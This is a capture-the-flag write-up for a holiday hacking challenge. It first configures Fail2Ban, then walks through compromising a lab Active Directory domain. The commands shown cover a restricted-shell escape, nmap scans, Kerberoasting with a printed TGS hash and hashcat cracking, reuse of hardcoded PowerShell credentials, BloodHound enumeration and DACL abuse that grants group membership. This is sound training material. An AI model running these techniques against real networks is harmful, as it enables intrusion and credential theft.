Objective

image-20220107151025566

Terminal - HoHo … No

Challenge

Even Snowshoes is waiting in Santa’s office with the HoHo…No terminal:

image-20220107105320833

Hey there, how’s it going? I’m Eve Snowshoes.

Lately I’ve been spending a lot of cycles worrying about what’s going on next door.

Before that, I was checking out Fail2Ban.

It’s this slick log scanning tool for Apache web servers.

If you can complete this terminal challenge, I’d be happy to give you some things I’ve learned about Kerberoasting and Active Directory permissions!

Why don’t you do some work with Fail2Ban on this Cranberry Pi terminal first, then we’ll talk Kerberoasting and Active Directory. OK?

The terminal header is all about Fail2Ban:

image-20220107105528008

Fail2Ban is designed to parse logs and have certain actions taken when a given log associated with a given IP happens too many times in a defined period. For example, if there are more than 5 failed SSH logins from the same IP in 2 minutes, block that IP for one hour in IP tables.

This challenges asks that I parse a custom log, looking for 10 or more failures in an hour, and pass those to /root/naughtlylist.

Solution

The full solution for this challenge is in this video:

Identify Malicious Logs

Using greg to look at the log, I identified four different types of malicious logs:

  • Failed login:

    2022-01-03 22:10:22 Failed login from 101.103.18.26 for alabaster
    
  • Rejected:

    2022-01-03 22:10:29 Login from 20.252.236.61 rejected due to unknown user name
    
  • Invalid:

    2022-01-03 22:10:30 Invalid heartbeat 'delta' from 68.175.124.205
    
  • Malformed:

    2022-01-03 22:10:33 101.103.18.26 sent a malformed request
    

Configure Fail2Ban

Andy Smith gave a talk at this years KringleCon on Fail2Ban, and it’s a good walkthrough of how to configure it. I’ll need to create three files.

I’ll start with a filter, /etc/fail2ban/filter.d/df.conf :

[Definition]
failregex = Failed login from <HOST> for .+$
            Login from <HOST> rejected due to unknown user name$
            Invalid heartbeat '.+' from <HOST>$
            <HOST> sent a malformed request$

The four lines are the four options for matching in the log data. I can test the filter with fail2ban-regex (shown in the video).

Next, I need an action, which defines what happens when there’s a block. /etc/fail2ban/action.d/df.conf:

[Definition]
actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>

Finally, to tie them together, a jail file that describes how they interact, /etc/fail2ban/jail.d/df.conf:

[df]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
filter = df
action = df

Run It

To put these in place, I’ll restart the Fail2Ban service (service fail2ban restart), and then I’ll run /root/naughtlylist refresh to replay the logs and solve the challenge.

Kerberoasting on an Open Fire

Hints

Eve has gratitude and hints to offer:

Fantastic! Thanks for the help!

Hey, would you like to know more about Kerberoasting and Active Directory permissions abuse?

There’s a great talk by Chris Davis on this exact subject!

There are also plenty of resources available to learn more about Kerberoasting specifically.

If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443.

Got a hash that won’t crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.

Where’d you get your wordlist? CeWL might generate a great wordlist from the ElfU website, but it will ignore digits in terms by default.

So, apropos of nothing, have you ever known system administrators who store credentials in scripts? I know, I know, you understand the folly and would never do it!

The easy way to investigate Active Directory misconfigurations (for Blue and Red alike!) is with Bloodhound, but there are native methods as well.

Oh, and one last thing: once you’ve granted permissions to your user, it might take up to five minutes for it to propagate throughout the domain.

A record seven more hints unlock in my badge:

  • Check out Chris Davis’ talk and scripts on Kerberoasting and Active Directory permissions abuse.
  • Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
  • There will be some 10.X.X.X networks in your routing tables that may be interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged scans.
  • OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn’t enough.
  • CeWL can generate some great wordlists from website, but it will ignore digits in terms by default.
  • Administrators often store credentials in scripts. These can be coopted by an attacker for other purposes!
  • Investigating Active Directory errors is harder without Bloodhound, but there are native methods.

Solution

There’s a full walkthrough of solving this challenge in this video:

A summary of the steps follows here as well.

Get Creds

Visiting the page redirects to /register, which has a registration form.

image-20220107131211007

On submitting data, I’m giving a username and credentials to the grading server:

image-20220107131249357

Escape the Limited Shell

When I connect, I’m in some kind of custom shell:

===================================================
=      Elf University Student Grades Portal       =
=          (Reverts Everyday 12am EST)            =
===================================================
1. Print Current Courses/Grades.
e. Exit
: 

Entering 1:

0  Shortname                    Description  Grade
==================================================
1    WHOL101       World Holiday Literature     F 
2    NPAR301    North Pole Art Appreciation     D+
3    REIH201             Reindeer Husbandry     F 
4    GEOG101      Geometry of Gift-Wrapping     B-
5    SLPE101  Sleigh Propulsion Engineering     C+
Press Enter to continue...

Anything else clears and reprints menu, except e, which exits closing the SSH connection.

Ctrl-z and Ctrl-c both print:

You may only type 'exit' to leave the exam

Ctrl-d however drops to a Python terminal:

===================================================
=      Elf University Student Grades Portal       =
=          (Reverts Everyday 12am EST)            =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
  File "/opt/grading_system", line 41, in <module>
    main()
  File "/opt/grading_system", line 26, in main
    a = input(": ").lower().strip()
EOFError
>>> 

And I can drop to a bash shell:

>>> os.system("bash")
rncztspfgz@grades:~$ 

I can also update my users shell from the grading program to bash with chsh.

Find Servers

This host’s IP is in the 172.17.0.0/24 subnet. Looking at the routing tables (as suggested by the hints), there are three 10.128.X.0/24 networks:

rncztspfgz@grades:~$ ip route                                  
default via 172.17.0.1 dev eth0                                
10.128.1.0/24 via 172.17.0.1 dev eth0                          
10.128.2.0/24 via 172.17.0.1 dev eth0                          
10.128.3.0/24 via 172.17.0.1 dev eth0                          
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2

nmap scanning will identify a bunch of hosts, but the two most of interest are DC01 and SHARE30, both on the elfu.local domain:

rncztspfgz@grades:~$ nmap -Pn -sCV 10.128.1.53
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:09 UTC
Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)
Host is up (0.00057s latency).                                                 
Not shown: 988 filtered ports                                                  
PORT     STATE SERVICE       VERSION                                           
53/tcp   open  domain?                                                         
| fingerprint-strings:                                                         
|   DNSVersionBindReqTCP:                                                      
|     version                                                                  
|_    bind                                                                     
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-07 18:09:13Z)                                                                   
135/tcp  open  msrpc         Microsoft Windows RPC                             
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)                                    
445/tcp  open  microsoft-ds?                                                   
464/tcp  open  kpasswd5?                                                       
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped                                                      
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)                                    
3269/tcp open  tcpwrapped                                                      
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:                                                               
|   Target_Name: ELFU                                                          
|   NetBIOS_Domain_Name: ELFU                                                  
|   NetBIOS_Computer_Name: DC01                                                
|   DNS_Domain_Name: elfu.local                                                
|   DNS_Computer_Name: DC01.elfu.local                                         
|   DNS_Tree_Name: elfu.local                                                  
|   Product_Version: 10.0.17763                                                
|_  System_Time: 2022-01-07T18:11:29+00:00                                     
| ssl-cert: Subject: commonName=DC01.elfu.local                                
| Not valid before: 2021-10-28T19:21:37                                        
|_Not valid after:  2022-04-29T19:21:37                                        
|_ssl-date: 2022-01-07T18:12:09+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D881CE%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");                                                     
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:                                                           
| smb2-security-mode:                                                          
|   2.02:
|_    Message signing enabled and required                                     
| smb2-time:                                                                   
|   date: 2022-01-07T18:11:32                                                  
|_  start_date: N/A                                                            

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                
Nmap done: 1 IP address (1 host up) scanned in 254.17 seconds 

rncztspfgz@grades:~$ nmap -PS22,445 -sCV 10.128.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:37 UTC
Nmap scan report for 10.128.3.30
Host is up (0.00027s latency).                                                 
Not shown: 966 closed ports                                                    
PORT     STATE SERVICE      VERSION                                            
22/tcp   open  ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                                                                 
|   2048 ce:7e:b4:4b:bc:b9:39:6f:10:d8:3f:f4:3f:6a:06:ef (RSA)
|   256 eb:a9:4b:ec:04:c0:7a:0e:a3:36:f7:4b:49:d7:de:bf (ECDSA)
|_  256 c1:a9:ac:ad:69:13:b7:b1:23:c7:d4:cc:8f:32:1e:b0 (ED25519)
53/tcp   open  domain       (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:                                                      
|     version                                                                  
|_    bind
80/tcp   open  http         Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10                             
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.128.3.30/register
88/tcp   open  kerberos-sec Heimdal Kerberos (server time: 2022-01-07 18:37:11Z)
135/tcp  open  msrpc        Microsoft Windows RPC                              
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: ELFU)
389/tcp  open  ldap         (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:25+00:00; -42s from scanner time.
445/tcp  open  netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: ELFU)
464/tcp  open  kpasswd5?                                                       
636/tcp  open  ssl/ldap     (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:51+00:00; -16s from scanner time.
1024/tcp open  msrpc        Microsoft Windows RPC
...[snip]...
1044/tcp open  tcpwrapped                                                      
2222/tcp open  ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap         (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:38:36+00:00; +29s from scanner time.
3269/tcp open  ssl/ldap     (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:00+00:00; -1m07s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D8885C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,2B,"\0\)\0\x06\x81\x80\0\x01\0\0\0\0\0\x01\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\)\x02\0\0\0\0\0\0\0")%r(DNSStatusRequestTCP,E,
SF:"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");                                      
Service Info: Host: SHARE30; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows                                                    

Host script results:                                                           
|_clock-skew: mean: -13s, deviation: 31s, median: 0s
|_nbstat: NetBIOS name: SHARE30, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)                                                                    
| smb-os-discovery:                                                            
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                      
|   Computer name: share30                                                     
|   NetBIOS computer name: SHARE30\x00                                         
|   Domain name: elfu.local                                                    
|   FQDN: share30.elfu.local                                                   
|_  System time: 2022-01-07T18:37:59+00:00                                     
| smb-security-mode:                                                           
|   account_used: <blank>                                                      
|   authentication_level: user                                                 
|   challenge_response: supported                                              
|_  message_signing: required                                                  
| smb2-security-mode:                                                          
|   2.02:                                                                      
|_    Message signing enabled and required                                     
| smb2-time:                                                                   
|   date: 2022-01-07T18:37:59                                                  
|_  start_date: N/A                                                            

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.92 seconds

SHARE30 has two interesting shares:

rncztspfgz@grades:~$ smbclient -L //10.128.3.30                                                                                                               
Enter WORKGROUP\rncztspfgz's password:                                         

        Sharename       Type      Comment                                      
        ---------       ----      -------
        netlogon        Disk
        sysvol          Disk
        elfu_svc_shr    Disk      elfu_svc_shr
        research_dep    Disk      research_dep
        IPC$            IPC       IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available 

research_dep seems like where I’m probably trying to get eventually.

elfu_svc via Kerberoast

Because I have a domain user, I can find any kerberoastable accounts from the DC using the Impacket script that is conveniently installed on the grading server:

rncztspfgz@grades:~$ GetUserSPNs.py -request -dc-ip 10.128.1.53 elfu.local/rncztspfgz:'Iylbegxmf#'                                                            
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation                                                                                                      
                                                                               
ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon  Delegation                                                    
-----------------------------------  --------  --------  --------------------------  ---------  ----------                                                    
ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  <never>

                                                                               
                                                                               
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$da9854fa969fcfcd7ca524745b0d8bcf$5ad62e78b2fc539722b7c7d97e84dc0d06d585db187316f98eb3c0688b93100dc9eb42a76af01d9340e3a4d527a011c421b22eeda687092d06fe0a44a6b84572abf982acc90e8eefffd31549543dc883af910f2a78da903f231f488028a537179560d3522ad116da25589d9d28e08b5f7f2575
20b4775f09f0e20484b7757250f8f4616748fb1aa0abb7c12c45c4f58ffb5d2162506daebcd651a2d637eff520b974d8021ea5cd5a9d4648ff204f528149bbf7905223b6cb2eeea84ee8e1159da8918bbb33d679d318b4d8fbaebb70b57538a5126217acd70934317d2dea4e27c45fa4089326e11deb13fe2bbd4134f725ffc141040893dc27413feb4e2d4a4f713f669d4aadb50795d0d65380febfce00b
bdc0ab1e119e7a1710035e2081628d7b85be3773e20439741f23c6bc6ce6115f89b4250459b12f70c76e3c7dff17f9de68d36aef4b8ab96da1d0453d523374309c315db2e115e6365400eac57b1f61c8db785354bf906f86322a9c52d32d36ac8ae1df306a51be5a06a70b06bcfda767515be9f2bb7636354d0e0474dba0662ea641c108c0cd3825c9dda78df919cd21cd432684110f0335118d42272fb2a
97b76d5dac062ab7732a159b5b2893fe9e9957b7e1a93b11b32ebded0c8d94f2666454ce515518e7f442b9348f40259e54bd1d385c3206076ba410e7426f50067ce0150e9395ea7e1b5345b998be8d3274e941111346c87b94960ff79360d5feebcce8cb90850682b30d2c054847daac86409d126d418ce37217870c7d4925790fb64f7eb1fa1af2e6d773d535c7a7900eb15dba4f1014a88957d9914ff04
b86c2d9636928126983c1fcfa351f7ec2e996682c662c0f40854b1f96d5900179bfa4d703e82d7d3064375c9676d62717b8dd28a10df4e42c9fa8695441d11f4ec16642f69fced598720d5ea2a66e0a85eb02c72a9cfe778ffbd7ed23597a5e16e45c176e395a035122e08c926f7dc19ac8810e9f664ced36f34f5dda2af81fcabdb0b73fb7c00eea782efc03798b815748c93e2a7bda911ed39ec20df3b5
92190efa9c92cf98f2555749b0e442020661cc5858cddbc32102aa4c91cb198b4bd7eaa779e79bf85f88f8eb59d3beff250f3cd94ac1dacab92a127d337d67d127e673386ca3d5b807c1a9b44e5e039b04e3daaf02fecfc62d1b2e76ce25ab9b263054645eb2eeb7e4551a4a07924132a8288e2ac2bf0237b570722bca9b262b6db812dd2eca92a9b46340ea14bf1b4a0a0c9b004ffcc92853451556f6c3a
97b792fe3279b63d4283dab83554a6d5174ed800e767b6bc53fe393e88d963497811d08e859be078dd9c073a680fe98193edb75c9fccdbc778d76355faea27c95dc997de855e8bccadeab6d25dfdab5496f0e5fbc795815b625a8c7b0f74e428e64cf4cf13b5e90f87d3ffd8d0d4ab01e660087127b53486574

It returns a hash for the elfu_svc account, which matches the share name from SHARE30.

Based on the hints, I’ll generate a wordlist from the elfu website using cewl:

$ /opt/CeWL/cewl.rb --with-numbers https://register.elfu.org/register > wordlist

I’ll use the wordlist plus the hash and the rule suggested in the hints to crack the hash with Hashcat:

$ hashcat -m 13100 -r OneRule.rule hash wordlist
...[snip]...

The password is “Snow2021!”.

remote_elf

I can’t access the DC or the research share, but I can access the elfu_svc_shr:

rncztspfgz@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu.local\\elfu_svc
Enter ELFU.LOCAL\elfu_svc's password:
Try "help" to get a list of possible commands.
smb: \>

The share has 160 PowerShell scripts in it. I’ll download them all, and do some grep to look for things of interest. When I look for elfu, I get a hit:

rncztspfgz@grades:~/scripts$ grep -i elfu *                             
GetProcessInfo.ps1:$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)

Not only is that a hit, but the script is creating a credential object. The script is just running the Get-Process command on the DC as remote_elf:

$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate

I’ll use these creds to get a PS session on the DC as remote_elf:

PS /home/rncztspfgz/scripts> $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQ
BlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"                                                               
PS /home/rncztspfgz/scripts> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7                                        
PS /home/rncztspfgz/scripts> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)                    
PS /home/rncztspfgz/scripts> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate
[10.128.1.53]: PS C:\Users\remote_elf\Documents>

Bloodhound

Now with three domain users owned, I’ll take a look at what they can control (I actually ran this towards the beginning, but now is when it’s time to look).

I can’t get files to/from the DC, but I can use bloodhound.py from the grading server (after using scp to get it there):

rncztspfgz@grades:~/bh$ python3 ../BloodHound.py/bloodhound.py -c all -u elfu_svc -d elfu.local -p 'Snow2021!' -dc dc01.elfu.local
INFO: Found AD domain: elfu.local
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 238 computers
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 246 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.elfu.local
INFO: Querying computer: share30.elfu.local
INFO: Skipping enumeration for share30.elfu.local since it could not be resolved.
INFO: Done in 00M 01S

I’ll scp the resulting files back to my host, and open them in BloodHound. After marking each of the users I control as owned, I’ll loook at the “First Degree Object Control” for each. remote_elf has a really interesting one:

image-20220107145408969

Access Research Department Share

With WriteDacl on the Researchdepartment group, I can add users to it. PowerView makes this easy, but since I can’t get files to the DC, I can use the scripts from Chris Davis’ gist. The first set of commands runs as remote_elf to give GenericAll to my user over the group:

[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

Next, I’ll use that new power to add myself to the group:

[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $password = "Iylbegxmf#"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

Once that propagates (can take up to five minutes), I can connect to the share on SHARE30:

rncztspfgz@grades:~/bh$ smbclient //10.128.3.30/research_dep Iylbegxmf#
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Dec  2 16:39:42 2021
  ..                                  D        0  Fri Jan  7 08:01:37 2022
  SantaSecretToAWonderfulHolidaySeason.pdf      N   173932  Thu Dec  2 16:38:26 2021

                41089256 blocks of size 1024. 34736208 blocks available

In that PDF, I’ll find the flag:

image-20220107145803910

Flag: Kindness